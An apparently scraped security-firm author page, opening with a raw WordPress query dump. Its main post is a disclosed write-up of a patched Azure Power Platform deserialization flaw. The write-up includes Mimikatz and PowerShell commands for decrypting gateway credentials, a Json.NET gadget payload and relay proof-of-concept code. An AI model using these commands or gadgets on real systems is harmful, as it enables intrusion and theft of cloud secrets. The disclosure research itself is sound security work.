Nick Landers

Nick Landers is an expert on malware development, AI/ML, and offensive research. He founded the Dark Side Ops training courses and develops tooling, evasions, and strategies for offensive security operations.
More by Nick Landers
WP_Query Object
(
    [query] => Array
        (
            [post_type] => Array
                (
                    [0] => post
                    [1] => webinars
                )

            [posts_per_page] => -1
            [post_status] => publish
            [meta_query] => Array
                (
                    [relation] => OR
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "77"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "77"
                            [compare] => LIKE
                        )

                )

        )

    [query_vars] => Array
        (
            [post_type] => Array
                (
                    [0] => post
                    [1] => webinars
                )

            [posts_per_page] => -1
            [post_status] => publish
            [meta_query] => Array
                (
                    [relation] => OR
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "77"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "77"
                            [compare] => LIKE
                        )

                )

            [error] => 
            [m] => 
            [p] => 0
            [post_parent] => 
            [subpost] => 
            [subpost_id] => 
            [attachment] => 
            [attachment_id] => 0
            [name] => 
            [pagename] => 
            [page_id] => 0
            [second] => 
            [minute] => 
            [hour] => 
            [day] => 0
            [monthnum] => 0
            [year] => 0
            [w] => 0
            [category_name] => 
            [tag] => 
            [cat] => 
            [tag_id] => 
            [author] => 
            [author_name] => 
            [feed] => 
            [tb] => 
            [paged] => 0
            [meta_key] => 
            [meta_value] => 
            [preview] => 
            [s] => 
            [sentence] => 
            [title] => 
            [fields] => 
            [menu_order] => 
            [embed] => 
            [category__in] => Array
                (
                )

            [category__not_in] => Array
                (
                )

            [category__and] => Array
                (
                )

            [post__in] => Array
                (
                )

            [post__not_in] => Array
                (
                )

            [post_name__in] => Array
                (
                )

            [tag__in] => Array
                (
                )

            [tag__not_in] => Array
                (
                )

            [tag__and] => Array
                (
                )

            [tag_slug__in] => Array
                (
                )

            [tag_slug__and] => Array
                (
                )

            [post_parent__in] => Array
                (
                )

            [post_parent__not_in] => Array
                (
                )

            [author__in] => Array
                (
                )

            [author__not_in] => Array
                (
                )

            [search_columns] => Array
                (
                )

            [ignore_sticky_posts] => 
            [suppress_filters] => 
            [cache_results] => 1
            [update_post_term_cache] => 1
            [update_menu_item_cache] => 
            [lazy_load_term_meta] => 1
            [update_post_meta_cache] => 1
            [nopaging] => 1
            [comments_per_page] => 50
            [no_found_rows] => 
            [order] => DESC
        )

    [tax_query] => WP_Tax_Query Object
        (
            [queries] => Array
                (
                )

            [relation] => AND
            [table_aliases:protected] => Array
                (
                )

            [queried_terms] => Array
                (
                )

            [primary_table] => wp_posts
            [primary_id_column] => ID
        )

    [meta_query] => WP_Meta_Query Object
        (
            [queries] => Array
                (
                    [0] => Array
                        (
                            [key] => new_authors
                            [value] => "77"
                            [compare] => LIKE
                        )

                    [1] => Array
                        (
                            [key] => new_presenters
                            [value] => "77"
                            [compare] => LIKE
                        )

                    [relation] => OR
                )

            [relation] => OR
            [meta_table] => wp_postmeta
            [meta_id_column] => post_id
            [primary_table] => wp_posts
            [primary_id_column] => ID
            [table_aliases:protected] => Array
                (
                    [0] => wp_postmeta
                )

            [clauses:protected] => Array
                (
                    [wp_postmeta] => Array
                        (
                            [key] => new_authors
                            [value] => "77"
                            [compare] => LIKE
                            [compare_key] => =
                            [alias] => wp_postmeta
                            [cast] => CHAR
                        )

                    [wp_postmeta-1] => Array
                        (
                            [key] => new_presenters
                            [value] => "77"
                            [compare] => LIKE
                            [compare_key] => =
                            [alias] => wp_postmeta
                            [cast] => CHAR
                        )

                )

            [has_or_relation:protected] => 1
        )

    [date_query] => 
    [request] => 
					SELECT   wp_posts.ID
					FROM wp_posts  INNER JOIN wp_postmeta ON ( wp_posts.ID = wp_postmeta.post_id )
					WHERE 1=1  AND ( 
  ( wp_postmeta.meta_key = 'new_authors' AND wp_postmeta.meta_value LIKE '{730cc2de67edb52eb242ee2787903f42d8e248f1395d903985a3ed643875ee58}\"77\"{730cc2de67edb52eb242ee2787903f42d8e248f1395d903985a3ed643875ee58}' ) 
  OR 
  ( wp_postmeta.meta_key = 'new_presenters' AND wp_postmeta.meta_value LIKE '{730cc2de67edb52eb242ee2787903f42d8e248f1395d903985a3ed643875ee58}\"77\"{730cc2de67edb52eb242ee2787903f42d8e248f1395d903985a3ed643875ee58}' )
) AND wp_posts.post_type IN ('post', 'webinars') AND ((wp_posts.post_status = 'publish'))
					GROUP BY wp_posts.ID
					ORDER BY wp_posts.post_date DESC
					
				
    [posts] => Array
        (
            [0] => WP_Post Object
                (
                    [ID] => 31572
                    [post_author] => 53
                    [post_date] => 2023-09-26 09:55:19
                    [post_date_gmt] => 2023-09-26 14:55:19
                    [post_content] => 




Watch Now

AI has taken the world by storm lately. From ChatGPT to automated spear phishing techniques, the security world has already seen changes in processes, automation, and threat detection - not to mention attack techniques! The recent surge of AI opens up opportunities for both defenders and adversaries alike. What can we build? What can we automate? How can we use AI to augment security to buy time and add another layer of defense to our enterprise?

In this AI-focused solutions forum, we’ll examine how AI will continue to change the security landscape. After all - tools for one are tools for many. Just as defenders benefit from AI capabilities, adversaries have found their own uses. Threat actors have found efficiencies using AI capabilities, from writing malware to discovering vulnerable systems. Defenders must be prepared for how AI will help bolster defenses while adversaries use it to ramp up their attacks.

Watch Nick Landers, VP of Research NetSPI, join the SANS team to discuss the risks, vulnerabilities, and benefits of rapidly introducing machine learning and artificial intelligence globally at the AI & ChatGPT Solutions Forum.

[wonderplugin_video iframe="https://youtu.be/lZCgXf3IW-U" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => Artificial Intelligence & ChatGPT [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => artificial-intelligence-and-chatgpt [to_ping] => [pinged] => [post_modified] => 2023-12-05 10:25:00 [post_modified_gmt] => 2023-12-05 16:25:00 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=31572 [menu_order] => 18 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [1] => WP_Post Object ( [ID] => 29835 [post_author] => 77 [post_date] => 2023-03-30 08:00:00 [post_date_gmt] => 2023-03-30 13:00:00 [post_content] =>

Azure maintains a large suite of automation tools between Logic Apps and the Power Platform (Automate, Apps, BI). On-Prem Data Gateways extend some of these automations by allowing actions to be carried out by a connected agent installed locally in customer networks.  

Originally these gateways were just designed for Power BI and “personal use” only, but you can also connect them to an Azure tenant and make them available to the larger subscription. In essence, you can bind an on-prem data gateway to an Azure gateway1 resource, then leverage that on-prem data gateway in a limited set of Power Platform Connectors from Logic Apps. Microsoft maintains a list of these supported connectors in their documentation (we also queried support via APIs to verify its accuracy): 

  • Apache Impala 
  • BizTalk Server 
  • File System 
  • HTTP with Azure AD 
  • IBM DB2 / Informix / MQ
  • MySQL 
  • Oracle Database 
  • PostgreSQL 
  • SAP 
  • SharePoint Server
  • SQL Server 
  • Teradata 

Originally, we wanted to inspect how these logic apps interact with gateways and discover code execution opportunities from an azure tenant into a host network. You might imagine the ability to access file data or force web requests on remote hosts as quite valuable to an attacker. However, our research led us in a more interesting direction that involved cross-tenant compromise in Power Platform Connectors hosted in Azure.

https://youtu.be/2kEHf9s596k

Installation Internals

The installation and setup of the gateway is straightforward. During the initial setup you’ll be prompted for account credentials, gateway name, and recovery key. After installation, the gateway should be bonded to the Power Platform, and you can verify its availability in the Admin Portal. Connecting the gateway to an Azure subscription does require you allocate a separate “On-Prem Gateway” object via the portal. It’s worth double checking your region and target subscription before the gateway object becomes available under “Installation Name”. 

On-premises data gateway portal in Azure.
Power Platform admin center showing gateway cluster: demo-gateway.
Subscription and instance details within Azure data gateway.

Back on the gateway host, a service for Microsoft.PowerBI.EnterpriseGateway.exe will be installed to run core functions. A configuration app EnterpriseGatewayConfigurator.exe is available to view the status of the service, reconfigure parameters, run diagnostics, etc. Underneath their relationship is backed by a localhost WCF TCP ServiceHost (IGatewayConfigurationService) using a ServiceAuthorizationManager to limit access to administrators. 

Any curiosity regarding the “recovery key” we supplied is well founded. Gateways support both symmetric and asymmetric encryption to securely transfer sensitive credentials. When registering the gateway, the recovery key will be used to derive a symmetric key stored by the gateway host. Random bytes will be encrypted with this key and attached to an annotation field on the gateway object in the Power Platform (referred to as a “witness string”). This allows client-side verification of a matching key during recovery/change operations. In addition to symmetric material, an RSA keypair will be generated by the service and the public component will be transferred during creation. As clarified by Microsoft, the symmetric key is retained locally as a derivation of the recovery key value. 

We can see the client request to create the gateway here:

PUT /unifiedgateway/gateways/CreateGatewayWithApps HTTP/2 
Host: wabi-us-north-central-redirect.analysis.windows.net 
Authorization: Bearer [token] 

{ 
    "createGatewayRequest": { 
        "gatewayName": "demo-gateway", 
        "gatewayDescription": null, 
        "gatewayAnnotation": "{\"gatewayContactInformation\":[\"noexist@netspi.com\"],\"gatewayVersion\":\"3000.154.3\",\"gatewayWitnessString\":\"{\\\"EncryptedResult\\\":\\\"qAesqTDEw5WdQq[…]\\\",\\\"IV\\\":\\\"Zqq9Hc2qIFNzVOBEz5ymsg==\\\",\\\"Signature\\\":\\\"i9Urdz0HlpRBEuklU[…]\\\"}\",\"gatewayMachine\":\"DESKTOP-BDI31DO\",\"gatewaySalt\":\"51lQj3EFVfousJiQuSQdYQ==\",\"gatewayWitnessStringLegacy\":null,\"gatewaySaltLegacy\":null,\"gatewayDepartment\":null,\"gatewayVirtualNetworkSubnetId\":null}", 
        "gatewayPublicKey": "PD94bWwgdmVyc2lvbj0iMS4wIj8+DQo8UlNBUGFyYW1ldGVycyB4bWxuczp4c2Q9Imh0dHA[…]", 
        "gatewayVersion": "3000.154.3", 
        "gatewaySBDetails": null, 
        "gatewaySBDetailsSecondary": null, 
        "createSecondaryRelay": true 
    } 
}

The response to this request gives us additional context for how the gateway communicates with other components:

HTTP/2 200 OK 
Content-Type: application/json; charset=utf-8 
Requestid: f30a7f4a-8dea-4b66-abe3-430054f0ed72 

{ 
    "gatewayId": 3139190, 
    "gatewayObjectId": "7a67b558-5ec0-4588-8c97-c2dd8ee2fb1d", 
    "gatewayName": "demo-gateway", 
    "gatewayType": "Resource", 
    "gatewaySBDetails": { 
        "gatewaySBKey": "ABBBmLK2loqL7yY414H/X33xAADL3Q/QZPLeyxbb14=", 
        "gatewaySBKeyName": "ListenAccessKey", 
        "gatewaySBEndpoint": "sb://wabi-us-north-central-relay12.servicebus.windows.net/4ec23ba7-6ebd-4ab4-921a-5256e2a27a70/" 
    }, 
    "gatewaySBDetailsSecondary": null, 
    "deprecatedServiceBusNamespace": null, 
    "deprecatedServiceBusEndpoint": null, 
    "deprecatedServiceBusNamespaceSecondary": null, 
    "deprecatedServiceBusEndpointSecondary": null 
}

On-Prem Data Gateways leverage an allocated Azure Relay connection (gatewaySBDetails) to securely expose its service to the public cloud. This was formerly known as Service Bus Relay hence the Service Bus key names. This allows cloud resources to bind to the gateway as if it were another cloud service and issue data processing requests. Users can supply their own relay details, or have the Power Platform allocate one. This relationship is managed by the Microsoft.PowerBI.* libraries and leverages a NetTcpRelayBinding and ServiceHost to expose the gateway to the public cloud. You can think of this as a reverse proxy to the gateway host via Azure Relay. 

In terms of connecting to this Azure Relay, the key material is readily available to us by proxying web traffic during installation. However, inspecting the local storage of this data is also a valuable exercise. All sensitive config data is stored in "%LocalAppData%\Microsoft\On-premises data gateway\Gateway.bin" from the context of the service account. It’s serialized JSON block with values protected by user-context DPAPI keys. We can perform a quick extraction using Mimikatz and Powershell: 

Extract the credentials and write blobs to disk: 

PS> $file = "C:\Windows\ServiceProfiles\PBIEgwService\AppData\Local\Microsoft\On-premises data gateway\Gateway.bin" 
PS> $creds = (cat $file | ConvertFrom-Json).credentials 
PS> $creds 

key               value 
---               ----- 
SBD               AQAAANCMnd8BFdERjHoA… 
SBDS              AQAAANCMnd8BFdERjHoA… 
SK                AQAAANCMnd8BFdERjHoA… 
LSK               AQAAANCMnd8BFdERjHoA… 
FileCredentialKey AQAAANCMnd8BFdERjHoA… 

PS> $creds | %{ [IO.File]::WriteAllBytes("$($_.key).bin", 
[Convert]::FromBase64String($_.value)) } 

Get the DPAPI_SYSTEM and service key with Mimikatz: 

PS> .\mimikatz.exe 
mimikatz # token::elevate 
mimikatz # lsadump::secrets 
mimikatz # dpapi::masterkey /in:"C:\Windows\ServiceProfiles\PBIEgwService\AppData\Roaming\Microsoft\Protect\[SID]\[KEY_GUID]" /system:[DPAPI_SYSTEM]

Decrypt the credential blobs:

mimikatz # dpapi::blob /in:SBD.bin /ascii 
mimikatz # dpapi::blob /in:SBDS.bin /ascii 
mimikatz # dpapi::blob /in:SK.bin /ascii 
mimikatz # dpapi::blob /in:LSK.bin /ascii 
mimikatz # dpapi::blob /in:FileCredentialKey.bin /ascii

The contents of FileCredentialKey give us the best context into the other values. The SBD blob is the allocated Azure Relay information from gateway creation, the SK blob is the symmetric key derived from the recovery value, and keyContainerName is the CSP name for our generated asymmetric key. With installation and some internals out the way, let’s move on to how data is serialized and passed on the relay.

{ 
    "id": 3139190, 
    "isDisconnected": true, 
    "objectId": "a9e6208f-669f-412f-a542-a4538121c38b", 
    "backendUri": "https://wabi-us-north-central-redirect.analysis.windows.net/", 
    "keyContainerName": "OdgAsymmetricKey", 

    "serviceBusDetails": {"index": "SBD"}, 
    "serviceBusDetailsSecondary": {"index": "SBDS"}, 
    "symmetricKey": {"index": "SK"}, 
    "legacySymmetricKey": {"index": "LSK"} 
}

Type Handling and Binders

The interface exposed on the relay backed ServiceHost is very simple. It’s essentially a single TransferAsync function on the gateway side and a callback contract for replying (TransferCallbackAsync). Both functions take a single byte array as their argument.

public interface IGatewayTransferCallback 
{ 
    [OperationContract(IsOneWay = true)] 
    Task TransferCallbackAsync(byte[] packet); 
} 

[ServiceContract(CallbackContract = typeof(IGatewayTransferCallback))] 
public interface IGatewayTransferService 
{ 
    [OperationContract(IsOneWay = true)] 
    Task PingAsync(); 

    [OperationContract(IsOneWay = true)] 
    Task TransferAsync(byte[] packet); 
}

The binary data passed to these functions is referred to as a Relay Packet. These packets are serialized binary data blocks, optionally compressed or chunked, and prefixed with a RelayPacketHeader to provide context.

[Flags] 
public enum ControlFlags : byte 
{ 
    None = 0, 
    EndOfData = 1, 
    HasTelemetry = 2, 
    HasCorrectDataSize = 4, 
} 

public enum XPress9Level 
{ 
    None = 0, 
    Level6 = 6, 
    Level9 = 9, 
} 

public enum DeserializationDirective 
{ 
    Json = 1, 
    BinaryRowset = 2, 
    BinaryVarData = 3, 
} 

[StructLayout(LayoutKind.Explicit, Size = 21, Pack = 1)] 
public sealed class RelayPacketHeader 
{ 
    private ControlFlags flags; 
    private int index; 
    private int uncompressedDataSize; 
    private int compressedDataSize; 
    private XPress9Level compressionAlgorithm; 
    private DeserializationDirective deserializationDirective; 
}

We are predominantly concerned with the Json deserialization directive, which is supported by standard JSON.NET (Newtonsoft) libraries. The inspection of core deserialization code leads us to an extremely concerning TypeNameHandling.All configuration.

static T JsonDeserialize<T>(string payload) where T : class 
{ 
    JsonSerializerSettings settings = new JsonSerializerSettings() 
    { 
        TypeNameHandling = TypeNameHandling.All, 
        SerializationBinder = (ISerializationBinder)new DataMovementSerializationBinder() 
        // ... 
    }; 

    return JsonConvert.DeserializeObject<T>(payload, settings); 
}

It would appear some considerations are made for type security. The DataMovementSerializationBinder is applied to check incoming type names for validity. However, the use of serialization binders for security is not recommended and this binder is a great example of why. 

We’ve extracted just a small snippet of the decompiled source, but the relevant weakness is the allow listing of any types from PowerBI, DataMovement, and Mashup assemblies in IsAcceptableAssemblyName regardless of the specific type. 

public Type BindToType(string assemblyName, string typeName) { 
    if (this.IsAcceptableBasicTypeName(typeName) ||  
        this.IsAcceptableAssemblyName(assemblyName) || 
        this.IsAcceptableDictionaryType(typeName) ||  
        this.IsAcceptableMscorlibException(assemblyName, typeName) 
    ) { 
        return this.serializationBinder.BindToType(assemblyName, typeName) 
    } 

    return null; 
} 

private bool IsAcceptableAssemblyName(string assemblyName) { 
    return assemblyName.StartsWith("Microsoft.PowerBI") ||  
        assemblyName.StartsWith("Microsoft.DataMovement") ||  
        assemblyName.StartsWith("Microsoft.Mashup") ||  
        assemblyName.StartsWith("Microsoft.Data.Mashup"); 
}

A quick scan of available types leads us to Microsoft.Mashup.Storage.SerializableDictionary, an overload of a standard Dictionary class with a controllable value type that won’t be checked. We also need to find a vulnerable object tree that types some property as a generic Object to bypass IsAssignableTo checks, but that's also quite trivial. Ultimately Microsoft.PowerBI.DataMovement.Pipeline.InternalContracts.Communication.GatewayHttpWebRequest with a nested Microsoft.Mashup.Storage.SerializableDictionary for our WindowsIdentity gadget gets the job done: 

{ 
  '$type': 'Microsoft.PowerBI.DataMovement.Pipeline.InternalContracts.Communication.GatewayHttpWebRequest, Microsoft.PowerBI.DataMovement.Pipeline.InternalContracts', 
  'request': { '$type': 'System.Byte[], mscorlib', '$value': '/w==' }, 
  'property': { 
    '$type': 'System.Collections.Generic.Dictionary`2[[System.String, mscorlib],[System.Object, mscorlib]], mscorlib', 
    'foo': { 
      '$type': 'Microsoft.Mashup.Storage.SerializableDictionary`2[[System.String, mscorlib],[System.Security.Principal.WindowsIdentity, mscorlib]], Microsoft.MashupEngine', 
      'bar': { 
        'System.Security.ClaimsIdentity.actor': '**PAYLOAD**' 
      } 
    } 
  } 
}

Return to Sender

We now have the primitive necessary to exploit processing code on either end of the Azure Relay for code execution. We could attempt to target the gateway itself but gaining remote access to the required access keys makes this a very limited attack vector. However, going the other way is much more interesting. The Power Platform runtime, which puts messages on the relay, likely leverages the same serialization code and we already understand how to communicate on the relay. 

We can now leverage a minimal Azure relay client to bind to the cloud and wait for tasking. When a Power Platform Connector communicates with the gateway, we can wrap our serialization payload in a RelayPacketHeader and deliver it using TransferCallbackAsync. Getting the Power Platform to communicate with the fake gateway is straight-forward. We set up a fresh Logic App, select one of the on-prem supported connectors, and trigger any activity against our gateway (test connection, store credentials, query data, etc.). You can find the proof-of-concept on Github and the relevant code below.

class GatewayTransferService : IGatewayTransferService 
{ 
    public Task PingAsync() { 
        return new Task(() => {}); 
    } 

    public Task TransferAsync(byte[] bytes) 
    { 
        string Payload = "..."; 

        var response = Encoding.Unicode.GetBytes(Payload); 
        byte[] responseBytes = new byte[response.Length + RelayPacketHeader.Size]; 

        new RelayPacketHeader() 
        { 
            HasCorrectDataSize = true, 
            IsLast = true, 
            Index = 0, 
            UncompressedDataSize = response.Length, 
            CompressedDataSize = response.Length, 
            CompressionAlgorithm = XPress9Level.None, 
            DeserializationDirective = DeserializationDirective.Json 
        }.Serialize(responseBytes); 

        Array.Copy((Array)response, 0, (Array)responseBytes, RelayPacketHeader.Size, response.Length); 

        IGatewayTransferCallback callback = OperationContext.Current.GetCallbackChannel<IGatewayTransferCallback>(); 
        return callback.TransferCallbackAsync(responseBytes); 
    } 
} 

// ... 

ServiceBusEnvironment.SystemConnectivity.Mode = ConnectivityMode.Http; 

ServiceHost serviceHost = new ServiceHost(typeof(GatewayTransferService)); 

serviceHost.AddServiceEndpoint( 
    typeof(IGatewayTransferService), 
    new NetTcpRelayBinding() { IsDynamic = false }, 
    Endpoint 
).Behaviors.Add( 
    new TransportClientEndpointBehavior { 
        TokenProvider = TokenProvider.CreateSharedAccessSignatureTokenProvider(KeyName, Key) 
    } 
); 

serviceHost.Open();
Logic Apps Designer showing the Power Platform application.

Depending on the connector used, different backends will process the final payload. Initially we delivered various exploratory payloads using various connectors, which in turn would exfiltrate environmental data to an Azure Function App. We selected the most promising backend without additional obvious sandboxing (HTTP w/ Azure AD) and deployed a full stage 2 agent into memory (Slingshot). We achieved SYSTEM access, and the execution environment was clearly deep inside first-party Power Platform services in Azure.  

From the compromised host, the IMDS endpoint granted access to an authentication token for various key vault secrets and keys. We retrieved fabric configuration files, tenant information, and access to managed identities. From the decrypted Azure VM extension settings, we were able to identify Storage Account keys along with several valid SAS token Storage Account URLs configured with long expiration durations (~3 months) and the ability to list and read files (sp=rl). Overall, we calculated access to at least 1,300 secrets/certs over ~180 vaults. When it was clear cross-tenant access was possible, we burned off the affected hosts and a full report was delivered to MSRC.

Screenshot showing code execution on power platform connectors host.
Screenshot showing cross-tenant access in Azure.
Screenshot showing cross-tenant access in Azure.

Conclusion

Microsoft fixed this issue by completely rebuilding their serialization binder to enforce much stricter type allow list. They also appear to have distinct binders for both the gateway and cloud sides, but safe serialization in such a complex system clearly remains a tricky task even for Microsoft. There are many areas of related research that we didn’t get to. The Power Platform and its relationship to Azure is rich in technical complexity. I’m sure a motivated researcher could yield more interesting results from the execution of requests in the client, individual logic app functionality, gateway APIs, and data sanitization. As we also discovered, different logic apps appeared to be supported by an array of backend systems with different configurations, isolations, and intents. I hope this post can inspire fresh eyes to look at these systems more. 

Appendix A – Disclosure Timeline 

  • September 2022: Report filed with MSRC. 
  • October 2022: MSRC opens case 75270 and additional details are provided. 
  • October 2022: Call with MSRC stakeholders to demonstrate vulnerability. 
  • November 2022: Fix is deployed to public cloud. 
  • December 2022: Fix is deployed to all remaining regions. 

Appendix B – References 

[post_title] => Riding the Azure Service Bus (Relay) into Power Platform [post_excerpt] => NetSPI discovered a remote code execution vulnerability in Power Platform Connectors that allowed access to cross-tenant data. This issue was resolved with the help of MSRC teams at Microsoft. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-service-bus-power-platform [to_ping] => [pinged] => [post_modified] => 2023-03-30 13:32:28 [post_modified_gmt] => 2023-03-30 18:32:28 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29835 [menu_order] => 116 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [2] => WP_Post Object ( [ID] => 29416 [post_author] => 77 [post_date] => 2023-02-09 09:00:00 [post_date_gmt] => 2023-02-09 15:00:00 [post_content] =>

On February 9, NetSPI's Nick Landers and Nabil Hannan were featured in the Digital Journal article called What Cybersecurity Risk to AI Chatbots Pose?. Read the preview below or view it online.

+++

ChatGPT is a tool from OpenAI that enables a person to type natural-language prompts. To this, ChatGPT offers conversational, if somewhat stilted, responses. The potential of this form of ‘artificial intelligence’ is, nonetheless, considerable.

Google is launching Bard A.I. in response to ChatGPT and Microsoft is following closely with an application called Redmond.

What do these tools mean for the expanding threat landscape? To find out, Digital Journal sought the opinions of two NetSPI representatives.

First is Nabil Hannan, Managing Director at NetSPI. According to Hannan businesses seeking to adopted the technology need to stand back and consider the implications: “With the likes of ChatGPT, organizations have gotten extremely excited about what’s possible when leveraging AI for identifying and understanding security issues—but there are still limitations. Even though AI can help identify and triage common security bugs faster – which will benefit security teams immensely – the need for human/manual testing will be more critical than ever as AI-based penetration testing can give organizations a false sense of security.”

Hannan adds that things can still go wrong, and that AI is not perfect. This could, if unplanned, impact on a firm’s reputation. Hannan adds: “In many cases, it may not produce the desired response or action because it is only as good as its training model, or the data used to train it. As more AI-based tools emerge, such as Google’s Bard, attackers will also start leveraging AI (more than they already do) to target organizations. Organizations need to build systems with this in mind and have an AI-based “immune system” (or something similar) in place sooner rather than later, that will take AI-based attacks and automatically learn how to protect against them through AI in real-time.”

The second commentator is Nick Landers, VP of Research at NetSPI.

Landers looks at wider developments, noting: “The news from Google and Microsoft is strong evidence of the larger shift toward commercialized AI. Machine learning (ML) and AI have been heavily used across technical disciplines for the better part of 10 years, and I don’t predict that the adoption of advanced language models will significantly change the AI/ML threat landscape in the short term – any more than it already is. Rather, the popularization of AI/ML as both a casual conversation topic and an accessible tool will prompt some threat actors to ask, “how can I use this for malicious purposes?” – if they haven’t already.”

What does this mean for cybersecurity? Landers’ view is: “The larger security concern has less to do with people using AI/ML for malicious reasons and more to do with people implementing this technology without knowing how to secure it properly.”

He adds: “In many instances, the engineers deploying these models are disregarding years of security best practices in their race to the top. Every adoption of new technology comes with a fresh attack surface and risk. In the vein of leveraging models for malicious content, we’re already starting to see tools to detect generated content – and I‘m sure similar features will be implemented by security vendors throughout the year.”

Landers concludes, offering: “In short, AI/ML will become a tool leveraged by both offensive and defensive actors, but defenders have a huge head start at present. A fresh cat-and-mouse game has already begun with models detecting other models, and I’m sure this will continue. I would urge people to focus on defense-in-depth with ML as opposed to the “malicious actors with ChatGPT AI” narrative.”

Read the article at Digital Journal!

[post_title] => Digital Journal: What Cybersecurity Risk do AI Chatbots Pose? [post_excerpt] => NetSPI's Nick Landers and Nabil Hannan shared insights on what AI tools ChatGPT and Bard A.I. and mean for the expanding threat landscape. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => digital-journal-cybersecurity-risks-ai [to_ping] => [pinged] => [post_modified] => 2023-03-10 09:02:24 [post_modified_gmt] => 2023-03-10 15:02:24 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29416 [menu_order] => 134 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [3] => WP_Post Object ( [ID] => 29382 [post_author] => 77 [post_date] => 2023-02-06 09:00:00 [post_date_gmt] => 2023-02-06 15:00:00 [post_content] =>

On February 6, NetSPI Director of Research Nick Landers was featured in the SecurityWeek article called Cyber Insights 2023 | The Coming of Web3. Read the preview below or view it online.

+++

SecurityWeek Cyber Insights 2023 | The Coming of Web3 – Web3 is a term that has been hijacked for marketing purposes. Since web3 obviously represents the future internet, claiming to be web3 now is a claim to be the future today. Such claims should be viewed with caution – we don’t yet know what web3 will be.

Two of the biggest culprits are the cryptocurrency and NFT investment industries, which both use blockchains. They have claimed to be web3 so vociferously that some pundits believe that web3 is blockchain. This is way too simplistic – these are just applications running on one technology that may become one of the web3 building blocks. 

Before we discuss the evolution of, and issues with, web3 in 2023 and beyond, we’ll first define one specific view of its basics. 

Financial institutions 

Since the blockchain was originally developed for use in the finance sector, it should be no surprise that the finance industry is one of the more interested sectors. “There is a major trend of blockchain adoption in large financial institutions,” says Nick Landers, director of research at NetSPI, specifically citing Broadridge, Citi and BNY Mellon. 

“The primary focus,” he continued, “is custodial offerings of digital assets, and private chains to maintain and execute trading contracts. Despite what popular culture would indicate, the business use cases for blockchain technology will likely deviate starkly from popularized tokens and NFTs.” Instead, he believes, industries will prioritize private chains to accelerate business logic, digital asset ownership on behalf of customers, and institutional investment in proof-of-stake chains.

By the end of next year, he expects that every major financial institution will have announced adoption of blockchain technology, if it hasn’t already. “While Ethereum, EVM, and Solidity-based smart contracts have received a huge portion of the security research, nuanced technologies like Hyperledger Fabric have received much less. In addition, the supported features in these business-focused private chain technologies differ significantly from their public counterparts.” 

It is worth noting that private blockchains are not decentralized blockchains – which begs the question, are they really web3?

Either way, this ultimately means more attack surface, more potential configuration mistakes, and more required training for development teams. “If you thought that blockchain is ‘secure by default’,” added Landers, “think again. Just like cloud platform adoption, we’ll see the promises of ‘secure by default’ fall away as unique attack paths and vulnerabilities are discovered in the nuances of this technology.”

Read the full article at SecurityWeek!

[post_title] => SecurityWeek: Cyber Insights 2023 | The Coming of Web3 [post_excerpt] => NetSPI Director of Research Nick Landers was featured in the SecurityWeek article called Cyber Insights 2023 | The Coming of Web3 [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => securityweek-cyber-insights-web3 [to_ping] => [pinged] => [post_modified] => 2023-02-16 17:28:17 [post_modified_gmt] => 2023-02-16 23:28:17 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29382 [menu_order] => 137 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [4] => WP_Post Object ( [ID] => 29374 [post_author] => 77 [post_date] => 2023-01-31 09:00:00 [post_date_gmt] => 2023-01-31 15:00:00 [post_content] =>

On January 31, NetSPI Director of Research Nick Landers was featured in the SecurityWeek article called Cyber Insights 2023 | Artificial Intelligence. Read the preview below or view it online.

+++

SecurityWeek Cyber Insights 2023 | Artificial Intelligence – The pace of artificial intelligence (AI) adoption is increasing throughout industry and society. This is because governments, civil organizations and industry all recognize greater efficiency and lower costs available from the use of AI-generated automation. The process is irreversible.

What is still unknown is the degree of danger that may be introduced when adversaries start to use AI as an effective weapon of attack rather than a tool for beneficial improvement. That day is coming and will begin to emerge from 2023.

The changing nature of AI (from anomaly detection to automated response) 

Over the last decade, security teams have largely used AI for anomaly detection; that is, to detect indications of compromise, presence of malware, or active adversarial activity within the systems they are charged to defend. This has primarily been passive detection, with responsibility for response in the hands of human threat analysts and responders. This is changing. Limited resources which will worsen in the expected economic downturn and possible recession of 2023 is driving a need for more automated responses. For now, this is largely limited to the simple automatic isolation of compromised devices; but more widespread automated AI-triggered responses are inevitable.

Failure in AI is generally caused by an inadequate data lake from which to learn. The obvious solution for this is to increase the size of the data lake. But when the subject is human behavior, that effectively means an increased lake of personal data and for AI, this means a massively increased lake more like an ocean of personal data. In most legitimate occasions, this data will be anonymized but as we know, it is very difficult to fully anonymize personal information.

“Privacy is often overlooked when thinking about model training,” comments Nick Landers, director of research at NetSPI, “but data cannot be completely anonymized without destroying its value to machine learning (ML). In other words, models already contain broad swaths of private data that might be extracted as part of an attack.” As the use of AI grows, so will the threats against it increase in 2023.

Read the full article at SecurityWeek!

